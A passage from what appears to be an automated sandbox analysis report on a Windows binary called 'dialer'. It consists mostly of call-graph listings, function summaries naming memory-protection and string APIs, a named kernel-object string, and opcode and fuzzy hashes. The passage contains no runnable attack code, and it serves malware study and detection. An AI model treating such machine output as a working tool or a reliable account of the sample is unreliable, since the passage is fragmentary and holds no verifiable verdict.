calls 2659->2660 2661 1400015f3 2660->2661 2661->2337 2661->2338 2663 140001394 2 API calls 2662->2663 2664 1400014b8 2663->2664 2665 140001394 2 API calls 2664->2665 2666 1400014c7 2665->2666 2667 140001394 2 API calls 2666->2667 2668 1400014d6 2667->2668 2669 1400014e5 2668->2669 2670 140001394 2 API calls 2668->2670 2671 140001394 2 API calls 2669->2671 2670->2669 2672 1400014ef 2671->2672 2673 1400014f4 2672->2673 2674 140001394 2 API calls 2672->2674 2675 140001394 2 API calls 2673->2675 2674->2673 2676 1400014fe 2675->2676 2677 140001503 2676->2677 2678 140001394 2 API calls 2676->2678 2679 140001394 2 API calls 2677->2679 2678->2677 2680 14000150d 2679->2680 2681 140001394 2 API calls 2680->2681 2682 140001512 2681->2682 2683 140001394 2 API calls 2682->2683 2684 140001521 2683->2684 2685 140001394 2 API calls 2684->2685 2686 140001530 2685->2686 2687 140001394 2 API calls 2686->2687 2688 14000153f 2687->2688 2689 140001394 2 API calls 2688->2689 2690 14000154e 2689->2690 2691 140001394 2 API calls 2690->2691 2692 14000155d 2691->2692 2693 140001394 2 API calls 2692->2693 2694 14000156c 2693->2694 2695 140001394 2 API calls 2694->2695 2696 14000157b 2695->2696 2697 140001394 2 API calls 2696->2697 2698 14000158a 2697->2698 2699 140001394 2 API calls 2698->2699 2700 140001599 2699->2700 2701 140001394 2 API calls 2700->2701 2702 1400015a8 2701->2702 2703 140001394 2 API calls 2702->2703 2704 1400015b7 2703->2704 2705 140001394 2 API calls 2704->2705 2706 1400015c6 2705->2706 2707 140001394 2 API calls 2706->2707 2708 1400015d5 2707->2708 2709 140001394 2 API calls 2708->2709 2710 1400015e4 2709->2710 2711 140001394 2 API calls 2710->2711 2712 1400015f3 2711->2712 2712->2347 2713 140001440 2712->2713 2714 140001394 2 API calls 2713->2714 2715 14000144f 2714->2715 2716 140001394 2 API calls 2715->2716 2717 14000145e 2716->2717 2718 140001394 2 API calls 2717->2718 2719 14000146d 2718->2719 2720 140001394 2 API calls 2719->2720 2721 14000147c 2720->2721 2722 140001394 2 API calls 2721->2722 2723 14000148b 2722->2723 2724 140001394 2 API calls 2723->2724 2725 14000149a 2724->2725 2726 140001394 2 API calls 2725->2726 2727 1400014a9 2726->2727 2728 140001394 2 API calls 2727->2728 2729 1400014b8 2728->2729 2730 140001394 2 API calls 2729->2730 2731 1400014c7 2730->2731 2732 140001394 2 API calls 2731->2732 2733 1400014d6 2732->2733 2734 1400014e5 2733->2734 2735 140001394 2 API calls 2733->2735 2736 140001394 2 API calls 2734->2736 2735->2734 2737 1400014ef 2736->2737 2738 1400014f4 2737->2738 2739 140001394 2 API calls 2737->2739 2740 140001394 2 API calls 2738->2740 2739->2738 2741 1400014fe 2740->2741 2742 140001503 2741->2742 2743 140001394 2 API calls 2741->2743 2744 140001394 2 API calls 2742->2744 2743->2742 2745 14000150d 2744->2745 2746 140001394 2 API calls 2745->2746 2747 140001512 2746->2747 2748 140001394 2 API calls 2747->2748 2749 140001521 2748->2749 2750 140001394 2 API calls 2749->2750 2751 140001530 2750->2751 2752 140001394 2 API calls 2751->2752 2753 14000153f 2752->2753 2754 140001394 2 API calls 2753->2754 2755 14000154e 2754->2755 2756 140001394 2 API calls 2755->2756 2757 14000155d 2756->2757 2758 140001394 2 API calls 2757->2758 2759 14000156c 2758->2759 2760 140001394 2 API calls 2759->2760 2761 14000157b 2760->2761 2762 140001394 2 API calls 2761->2762 2763 14000158a 2762->2763 2764 140001394 2 API calls 2763->2764 2765 140001599 2764->2765 2766 140001394 2 API calls 2765->2766 2767 1400015a8 2766->2767 2768 140001394 2 API calls 2767->2768 2769 1400015b7 2768->2769 2770 140001394 2 API calls 2769->2770 2771 1400015c6 2770->2771 2772 140001394 2 API calls 2771->2772 2773 1400015d5 2772->2773 2774 140001394 2 API calls 2773->2774 2775 1400015e4 2774->2775 2776 140001394 2 API calls 2775->2776 2777 1400015f3 2776->2777 2777->2347 2777->2355 2779 1400014e5 2778->2779 2780 140001394 2 API calls 2778->2780 2781 140001394 2 API calls 2779->2781 2780->2779 2782 1400014ef 2781->2782 2783 1400014f4 2782->2783 2784 140001394 2 API calls 2782->2784 2785 140001394 2 API calls 2783->2785 2784->2783 2786 1400014fe 2785->2786 2787 140001503 2786->2787 2788 140001394 2 API calls 2786->2788 2789 140001394 2 API calls 2787->2789 2788->2787 2790 14000150d 2789->2790 2791 140001394 2 API calls 2790->2791 2792 140001512 2791->2792 2793 140001394 2 API calls 2792->2793 2794 140001521 2793->2794 2795 140001394 2 API calls 2794->2795 2796 140001530 2795->2796 2797 140001394 2 API calls 2796->2797 2798 14000153f 2797->2798 2799 140001394 2 API calls 2798->2799 2800 14000154e 2799->2800 2801 140001394 2 API calls 2800->2801 2802 14000155d 2801->2802 2803 140001394 2 API calls 2802->2803 2804 14000156c 2803->2804 2805 140001394 2 API calls 2804->2805 2806 14000157b 2805->2806 2807 140001394 2 API calls 2806->2807 2808 14000158a 2807->2808 2809 140001394 2 API calls 2808->2809 2810 140001599 2809->2810 2811 140001394 2 API calls 2810->2811 2812 1400015a8 2811->2812 2813 140001394 2 API calls 2812->2813 2814 1400015b7 2813->2814 2815 140001394 2 API calls 2814->2815 2816 1400015c6 2815->2816 2817 140001394 2 API calls 2816->2817 2818 1400015d5 2817->2818 2819 140001394 2 API calls 2818->2819 2820 1400015e4 2819->2820 2821 140001394 2 API calls 2820->2821 2822 1400015f3 2821->2822 2822->2386 2824 140001394 2 API calls 2823->2824 2825 140001530 2824->2825 2826 140001394 2 API calls 2825->2826 2827 14000153f 2826->2827 2828 140001394 2 API calls 2827->2828 2829 14000154e 2828->2829 2830 140001394 2 API calls 2829->2830 2831 14000155d 2830->2831 2832 140001394 2 API calls 2831->2832 2833 14000156c 2832->2833 2834 140001394 2 API calls 2833->2834 2835 14000157b 2834->2835 2836 140001394 2 API calls 2835->2836 2837 14000158a 2836->2837 2838 140001394 2 API calls 2837->2838 2839 140001599 2838->2839 2840 140001394 2 API calls 2839->2840 2841 1400015a8 2840->2841 2842 140001394 2 API calls 2841->2842 2843 1400015b7 2842->2843 2844 140001394 2 API calls 2843->2844 2845 1400015c6 2844->2845 2846 140001394 2 API calls 2845->2846 2847 1400015d5 2846->2847 2848 140001394 2 API calls 2847->2848 2849 1400015e4 2848->2849 2850 140001394 2 API calls 2849->2850 2851 1400015f3 2850->2851 2851->2386 2853 140001394 2 API calls 2852->2853 2854 140001431 2853->2854 2855 140001394 2 API calls 2854->2855 2856 140001440 2855->2856 2857 140001394 2 API calls 2856->2857 2858 14000144f 2857->2858 2859 140001394 2 API calls 2858->2859 2860 14000145e 2859->2860 2861 140001394 2 API calls 2860->2861 2862 14000146d 2861->2862 2863 140001394 2 API calls 2862->2863 2864 14000147c 2863->2864 2865 140001394 2 API calls 2864->2865 2866 14000148b 2865->2866 2867 140001394 2 API calls 2866->2867 2868 14000149a 2867->2868 2869 140001394 2 API calls 2868->2869 2870 1400014a9 2869->2870 2871 140001394 2 API calls 2870->2871 2872 1400014b8 2871->2872 2873 140001394 2 API calls 2872->2873 2874 1400014c7 2873->2874 2875 140001394 2 API calls 2874->2875 2876 1400014d6 2875->2876 2877 1400014e5 2876->2877 2878 140001394 2 API calls 2876->2878 2879 140001394 2 API calls 2877->2879 2878->2877 2880 1400014ef 2879->2880 2881 1400014f4 2880->2881 2882 140001394 2 API calls 2880->2882 2883 140001394 2 API calls 2881->2883 2882->2881 2884 1400014fe 2883->2884 2885 140001503 2884->2885 2886 140001394 2 API calls 2884->2886 2887 140001394 2 API calls 2885->2887 2886->2885 2888 14000150d 2887->2888 2889 140001394 2 API calls 2888->2889 2890 140001512 2889->2890 2891 140001394 2 API calls 2890->2891 2892 140001521 2891->2892 2893 140001394 2 API calls 2892->2893 2894 140001530 2893->2894 2895 140001394 2 API calls 2894->2895 2896 14000153f 2895->2896 2897 140001394 2 API calls 2896->2897 2898 14000154e 2897->2898 2899 140001394 2 API calls 2898->2899 2900 14000155d 2899->2900 2901 140001394 2 API calls 2900->2901 2902 14000156c 2901->2902 2903 140001394 2 API calls 2902->2903 2904 14000157b 2903->2904 2905 140001394 2 API calls 2904->2905 2906 14000158a 2905->2906 2907 140001394 2 API calls 2906->2907 2908 140001599 2907->2908 2909 140001394 2 API calls 2908->2909 2910 1400015a8 2909->2910 2911 140001394 2 API calls 2910->2911 2912 1400015b7 2911->2912 2913 140001394 2 API calls 2912->2913 2914 1400015c6 2913->2914 2915 140001394 2 API calls 2914->2915 2916 1400015d5 2915->2916 2917 140001394 2 API calls 2916->2917 2918 1400015e4 2917->2918 2919 140001394 2 API calls 2918->2919 2920 1400015f3 2919->2920 2920->2386 2922 140001394 2 API calls 2921->2922 2923 140001440 2922->2923 2924 140001394 2 API calls 2923->2924 2925 14000144f 2924->2925 2926 140001394 2 API calls 2925->2926 2927 14000145e 2926->2927 2928 140001394 2 API calls 2927->2928 2929 14000146d 2928->2929 2930 140001394 2 API calls 2929->2930 2931 14000147c 2930->2931 2932 140001394 2 API calls 2931->2932 2933 14000148b 2932->2933 2934 140001394 2 API calls 2933->2934 2935 14000149a 2934->2935 2936 140001394 2 API calls 2935->2936 2937 1400014a9 2936->2937 2938 140001394 2 API calls 2937->2938 2939 1400014b8 2938->2939 2940 140001394 2 API calls 2939->2940 2941 1400014c7 2940->2941 2942 140001394 2 API calls 2941->2942 2943 1400014d6 2942->2943 2944 1400014e5 2943->2944 2945 140001394 2 API calls 2943->2945 2946 140001394 2 API calls 2944->2946 2945->2944 2947 1400014ef 2946->2947 2948 1400014f4 2947->2948 2949 140001394 2 API calls 2947->2949 2950 140001394 2 API calls 2948->2950 2949->2948 2951 1400014fe 2950->2951 2952 140001503 2951->2952 2953 140001394 2 API calls 2951->2953 2954 140001394 2 API calls 2952->2954 2953->2952 2955 14000150d 2954->2955 2956 140001394 2 API calls 2955->2956 2957 140001512 2956->2957 2958 140001394 2 API calls 2957->2958 2959 140001521 2958->2959 2960 140001394 2 API calls 2959->2960 2961 140001530 2960->2961 2962 140001394 2 API calls 2961->2962 2963 14000153f 2962->2963 2964 140001394 2 API calls 2963->2964 2965 14000154e 2964->2965 2966 140001394 2 API calls 2965->2966 2967 14000155d 2966->2967 2968 140001394 2 API calls 2967->2968 2969 14000156c 2968->2969 2970 140001394 2 API calls 2969->2970 2971 14000157b 2970->2971 2972 140001394 2 API calls 2971->2972 2973 14000158a 2972->2973 2974 140001394 2 API calls 2973->2974 2975 140001599 2974->2975 2976 140001394 2 API calls 2975->2976 2977 1400015a8 2976->2977 2978 140001394 2 API calls 2977->2978 2979 1400015b7 2978->2979 2980 140001394 2 API calls 2979->2980 2981 1400015c6 2980->2981 2982 140001394 2 API calls 2981->2982 2983 1400015d5 2982->2983 2984 140001394 2 API calls 2983->2984 2985 1400015e4 2984->2985 2986 140001394 2 API calls 2985->2986 2987 1400015f3 2986->2987 2987->2386

                                                          Callgraph

                                                          • Executed
                                                          • Not Executed
                                                          • Opacity -> Relevance
                                                          • Disassembly available
                                                          callgraph 0 Function_00000001400026E1 1 Function_00000001400064E1 2 Function_0000000140001AE4 36 Function_0000000140001D40 2->36 79 Function_0000000140001BA0 2->79 3 Function_00000001400014E5 75 Function_0000000140001394 3->75 4 Function_0000000140002FF0 60 Function_0000000140001370 4->60 5 Function_00000001400010F0 6 Function_00000001400063F1 7 Function_00000001400062F1 8 Function_00000001400031F1 9 Function_00000001400014F4 9->75 10 Function_0000000140002500 11 Function_0000000140001800 71 Function_0000000140002290 11->71 12 Function_0000000140001000 13 Function_0000000140001E00 12->13 42 Function_0000000140001750 12->42 88 Function_0000000140001FB0 12->88 93 Function_0000000140001FC0 12->93 14 Function_0000000140001503 14->75 15 Function_0000000140001404 15->75 16 Function_0000000140002104 17 Function_0000000140001E10 18 Function_0000000140003210 19 Function_0000000140006311 20 Function_0000000140006411 21 Function_0000000140001512 21->75 22 Function_0000000140006420 23 Function_0000000140002320 24 Function_0000000140002420 25 Function_0000000140006920 50 Function_0000000140006660 25->50 26 Function_0000000140001521 26->75 27 Function_0000000140001422 27->75 28 Function_0000000140001530 28->75 29 Function_0000000140003230 30 Function_0000000140001431 30->75 31 Function_0000000140006331 32 Function_000000014000153F 32->75 33 Function_0000000140001440 33->75 34 Function_0000000140006640 35 Function_0000000140001140 51 Function_0000000140001160 35->51 36->71 37 Function_0000000140006441 38 Function_0000000140003141 39 Function_0000000140001F47 59 Function_0000000140001870 39->59 40 Function_0000000140002050 41 Function_0000000140003250 41->4 41->14 41->26 41->27 41->28 41->30 41->32 41->33 48 Function_000000014000145E 41->48 49 Function_0000000140002660 41->49 41->50 56 Function_000000014000156C 41->56 57 Function_000000014000146D 41->57 41->60 65 Function_000000014000157B 41->65 77 Function_0000000140001599 41->77 85 Function_00000001400015A8 41->85 86 Function_00000001400014A9 41->86 94 Function_00000001400016C0 41->94 99 Function_00000001400027D0 41->99 106 Function_00000001400014D6 41->106 43 Function_0000000140001650 44 Function_0000000140002751 45 Function_0000000140006351 46 Function_0000000140006551 47 Function_000000014000155D 47->75 48->75 51->41 51->51 51->59 66 Function_0000000140001880 51->66 70 Function_0000000140001F90 51->70 51->94 52 Function_0000000140001760 108 Function_00000001400020E0 52->108 53 Function_0000000140002460 54 Function_0000000140003160 55 Function_0000000140001E65 55->59 56->75 57->75 58 Function_000000014000216F 61 Function_0000000140006670 61->50 62 Function_0000000140001A70 62->36 62->79 63 Function_0000000140002770 64 Function_0000000140006471 65->75 66->24 66->36 66->49 66->79 67 Function_0000000140003180 68 Function_0000000140006381 69 Function_0000000140006581 72 Function_0000000140002590 73 Function_0000000140002790 74 Function_0000000140002691 75->25 75->61 76 Function_0000000140002194 76->59 77->75 78 Function_000000014000219E 79->36 87 Function_00000001400023B0 79->87 98 Function_00000001400024D0 79->98 80 Function_0000000140001FA0 81 Function_00000001400027A0 82 Function_00000001400031A1 83 Function_00000001400063A1 84 Function_00000001400064A1 85->75 86->75 89 Function_00000001400022B0 90 Function_00000001400026B0 91 Function_00000001400027B1 92 Function_0000000140001AB3 92->36 92->79 95 Function_00000001400063C1 96 Function_0000000140001AC3 96->36 96->79 97 Function_00000001400014C7 97->75 99->3 99->9 99->14 99->21 99->47 99->48 99->49 99->50 99->60 99->86 99->97 100 Function_00000001400017D0 101 Function_0000000140001FD0 102 Function_00000001400026D0 103 Function_00000001400062D1 104 Function_00000001400065D1 105 Function_0000000140001AD4 105->36 105->79 106->75 107 Function_00000001400017E0 107->108 109 Function_00000001400022E0

                                                          Executed Functions

                                                          Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • NtMapCMFModule.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                          Memory Dump Source
                                                          • Source File: 00000041.00000002.3442105288.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000041.00000002.3441829333.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442303779.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442397948.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442510479.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Module
                                                          • String ID:
                                                          • API String ID: 193471262-0
                                                          • Opcode ID: db3a2adbfd885308611a8e34f6847f87a6f17780172e7325b61373531d395d4d
                                                          • Instruction ID: d3c3cf79118e968cc42332799ff90b96b74b9ead5fc78a259f0acec360665963
                                                          • Opcode Fuzzy Hash: db3a2adbfd885308611a8e34f6847f87a6f17780172e7325b61373531d395d4d
                                                          • Instruction Fuzzy Hash: 35F09DB6608B408AEA12DB62F85179A77A5F38C7C0F009919BBC853735DB38C190CB40

                                                          Non-executed Functions

                                                          Function 00000001400027D0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 376COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 385 1400027d0-14000282b call 140002660 memset 388 140002831-14000283b 385->388 389 1400028fe-14000294e call 14000155d 385->389 391 140002864-14000286a 388->391 394 140002a43-140002a6b call 1400014c7 389->394 395 140002954-140002963 389->395 391->389 393 140002870-140002877 391->393 396 140002879-140002882 393->396 397 140002840-140002842 393->397 411 140002a76-140002ab8 call 140001503 call 140006660 memset 394->411 412 140002a6d 394->412 401 140002fa7-140002fe4 call 140001370 395->401 402 140002969-140002978 395->402 399 140002884-14000289b 396->399 400 1400028e8-1400028eb 396->400 403 14000284a-14000285e 397->403 405 1400028e5 399->405 406 14000289d-1400028b2 399->406 400->403 407 1400029d4-140002a3e wcsncmp call 1400014e5 402->407 408 14000297a-1400029cd 402->408 403->389 403->391 405->400 413 1400028c0-1400028c7 406->413 407->394 408->407 421 140002f39-140002f74 call 140001370 411->421 422 140002abe-140002ac5 411->422 412->411 415 1400028c9-1400028e3 413->415 416 1400028f0-1400028f9 413->416 415->405 415->413 416->403 425 140002ac7-140002afc 421->425 429 140002f7a 421->429 424 140002b03-140002b33 wcscpy wcscat wcslen 422->424 422->425 427 140002b35-140002b66 wcslen 424->427 428 140002b68-140002b95 424->428 425->424 430 140002b98-140002baf wcslen 427->430 428->430 429->424 431 140002bb5-140002bc8 430->431 432 140002f7f-140002f9b call 140001370 430->432 434 140002be5-140002eeb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 431->434 435 140002bca-140002bde 431->435 432->401 453 140002eed-140002f0b call 140001512 434->453 454 140002f10-140002f38 call 14000145e 434->454 435->434 453->454
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000041.00000002.3442105288.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000041.00000002.3441829333.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442303779.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442397948.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442510479.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                                          • String ID: 0$X$\BaseNamedObjects\aymhdakqytvceiwv$`
                                                          • API String ID: 780471329-1011632358
                                                          • Opcode ID: f63ea55df60fa7965909490aad9808008899d8cc114764b30a2c8ad78dde81d2
                                                          • Instruction ID: 6e1026da4e5fddd47d76c711813c21ea0c0a2746d6c1c324c3fe09965d5e19ec
                                                          • Opcode Fuzzy Hash: f63ea55df60fa7965909490aad9808008899d8cc114764b30a2c8ad78dde81d2
                                                          • Instruction Fuzzy Hash: 701259B2618B8081E762CB1AF8453EA77A4F789794F414215EBAC57BF5DF78C189C700
                                                          Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000041.00000002.3442105288.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000041.00000002.3441829333.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442303779.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442397948.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442510479.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                          • String ID:
                                                          • API String ID: 2643109117-0
                                                          • Opcode ID: 586022b6e751a55053106be641e00a3b8c3e9c35461d7db68985742fa9914fcd
                                                          • Instruction ID: 1a1351f792f9bf4967cc34d0f53f5ff7a53c0879af89bef87e4895d8dd39205b
                                                          • Opcode Fuzzy Hash: 586022b6e751a55053106be641e00a3b8c3e9c35461d7db68985742fa9914fcd
                                                          • Instruction Fuzzy Hash: 9851F1F1615A4485FA16EF27F9A47EA27A1BB8C7D0F449125FB4E873B2DF3884958300
                                                          Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 499 140001ba0-140001bc0 500 140001bc2-140001bd7 499->500 501 140001c09 499->501 502 140001be9-140001bf1 500->502 503 140001c0c-140001c17 call 1400023b0 501->503 504 140001bf3-140001c02 502->504 505 140001be0-140001be7 502->505 510 140001cf4-140001cfe call 140001d40 503->510 511 140001c1d-140001c6c call 1400024d0 VirtualQuery 503->511 504->505 507 140001c04 504->507 505->502 505->503 509 140001cd7-140001cf3 memcpy 507->509 515 140001d03-140001d1e call 140001d40 510->515 511->515 517 140001c72-140001c79 511->517 518 140001d23-140001d38 GetLastError call 140001d40 515->518 519 140001c7b-140001c7e 517->519 520 140001c8e-140001c97 517->520 522 140001cd1 519->522 523 140001c80-140001c83 519->523 524 140001ca4-140001ccf VirtualProtect 520->524 525 140001c99-140001c9c 520->525 522->509 523->522 527 140001c85-140001c8a 523->527 524->518 524->522 525->522 528 140001c9e 525->528 527->522 529 140001c8c 527->529 528->524 529->528
                                                          APIs
                                                          • VirtualQuery.KERNEL32(?,?,?,?,0000000140007E68,0000000140007E68,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                          • VirtualProtect.KERNEL32(?,?,?,?,0000000140007E68,0000000140007E68,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                          • memcpy.MSVCRT ref: 0000000140001CE0
                                                          • GetLastError.KERNEL32(?,?,?,?,0000000140007E68,0000000140007E68,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000041.00000002.3442105288.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000041.00000002.3441829333.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442303779.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442397948.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442510479.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                          • API String ID: 2595394609-2123141913
                                                          • Opcode ID: 189629d51215e3dd95598548a56e1a7d079b1a4a02dcbf9889c089ac4568ca2a
                                                          • Instruction ID: fdcea6415f7229f01c984092642b28fb5a36d70c662bb5773ed37d7d1973f443
                                                          • Opcode Fuzzy Hash: 189629d51215e3dd95598548a56e1a7d079b1a4a02dcbf9889c089ac4568ca2a
                                                          • Instruction Fuzzy Hash: D64132B1201A4486FA26DF57F884BE927A0F78DBC4F554126EF0E877B1DA38C586C700
                                                          Function 0000000140002104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 530 140002104-14000210b 531 140002111-140002128 EnterCriticalSection 530->531 532 140002218-140002221 530->532 533 14000220b-140002212 LeaveCriticalSection 531->533 534 14000212e-14000213c 531->534 535 140002272-140002280 532->535 536 140002223-14000222d 532->536 533->532 537 14000214d-140002159 TlsGetValue GetLastError 534->537 538 140002241-140002263 DeleteCriticalSection 536->538 539 14000222f 536->539 541 14000215b-14000215e 537->541 542 140002140-140002147 537->542 538->535 540 140002230-14000223f free 539->540 540->538 540->540 541->542 543 140002160-14000216d 541->543 542->533 542->537 543->542
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000041.00000002.3442105288.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000041.00000002.3441829333.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442303779.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442397948.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442510479.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                          • String ID:
                                                          • API String ID: 3326252324-0
                                                          • Opcode ID: 3a7d6074dc52b44e327b1ce3a8e74d0e8058649150b3659853f697306d85c7d1
                                                          • Instruction ID: afb0d6c5a9c099b73ff3c6c79e798d45aa650c7d30c6adae1a01f4103a689b7c
                                                          • Opcode Fuzzy Hash: 3a7d6074dc52b44e327b1ce3a8e74d0e8058649150b3659853f697306d85c7d1
                                                          • Instruction Fuzzy Hash: 4F21B3B1305A11D2FA6BDB53F9583E82364BB6CBD0F444121FF5A576B4DB798986C300
                                                          Function 0000000140001E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 545 140001e10-140001e2d 546 140001e3e-140001e48 545->546 547 140001e2f-140001e38 545->547 549 140001ea3-140001ea8 546->549 550 140001e4a-140001e53 546->550 547->546 548 140001f60-140001f69 547->548 549->548 553 140001eae-140001eb3 549->553 551 140001e55-140001e60 550->551 552 140001ecc-140001ed1 550->552 551->549 556 140001f23-140001f2d 552->556 557 140001ed3-140001ee2 signal 552->557 554 140001eb5-140001eba 553->554 555 140001efb-140001f0a call 140006c20 553->555 554->548 561 140001ec0 554->561 555->556 566 140001f0c-140001f10 555->566 559 140001f43-140001f45 556->559 560 140001f2f-140001f3f 556->560 557->556 562 140001ee4-140001ee8 557->562 559->548 560->559 561->556 563 140001eea-140001ef9 signal 562->563 564 140001f4e-140001f53 562->564 563->548 567 140001f5a 564->567 568 140001f12-140001f21 signal 566->568 569 140001f55 566->569 567->548 568->548 569->567
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000041.00000002.3442105288.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000041.00000002.3441829333.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442303779.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442397948.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442510479.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CCG
                                                          • API String ID: 0-1584390748
                                                          • Opcode ID: 5701baccf9870bc39b117922084b810e6e0275f78b30b514fbc6538b1739fc18
                                                          • Instruction ID: fad6180ef962ac1bf57e0d6b6b3de3a82f7bb0a4b16ac2ded5004f5be79f4ed3
                                                          • Opcode Fuzzy Hash: 5701baccf9870bc39b117922084b810e6e0275f78b30b514fbc6538b1739fc18
                                                          • Instruction Fuzzy Hash: 13214CB2B0150642FA77DA2BF5903F91192ABCC7E4F258536FF59473F5DE3888828241
                                                          Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 570 140001880-14000189c 571 1400018a2-1400018f9 call 140002420 call 140002660 570->571 572 140001a0f-140001a1f 570->572 571->572 577 1400018ff-140001910 571->577 578 140001912-14000191c 577->578 579 14000193e-140001941 577->579 581 14000194d-140001954 578->581 582 14000191e-140001929 578->582 580 140001943-140001947 579->580 579->581 580->581 584 140001a20-140001a26 580->584 585 140001956-140001961 581->585 586 14000199e-1400019a6 581->586 582->581 583 14000192b-14000193a 582->583 583->579 589 140001b87-140001b98 call 140001d40 584->589 590 140001a2c-140001a37 584->590 587 140001970-14000199c call 140001ba0 585->587 586->572 588 1400019a8-1400019c1 586->588 587->586 594 1400019df-1400019e7 588->594 590->586 591 140001a3d-140001a5f 590->591 597 140001a7d-140001a97 591->597 595 1400019e9-140001a0d VirtualProtect 594->595 596 1400019d0-1400019dd 594->596 595->596 596->572 596->594 600 140001b74-140001b82 call 140001d40 597->600 601 140001a9d-140001afa 597->601 600->589 607 140001b22-140001b26 601->607 608 140001afc-140001b0e 601->608 611 140001b2c-140001b30 607->611 612 